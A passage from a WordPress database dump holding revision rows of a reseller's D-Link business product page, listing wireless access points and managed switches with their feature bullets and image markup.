Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:31:13','2019-09-25 06:31:13','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3401,1,'2019-09-25 14:31:38','2019-09-25 06:31:38','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:31:38','2019-09-25 06:31:38','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3402,1,'2019-09-25 14:32:01','2019-09-25 06:32:01','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), 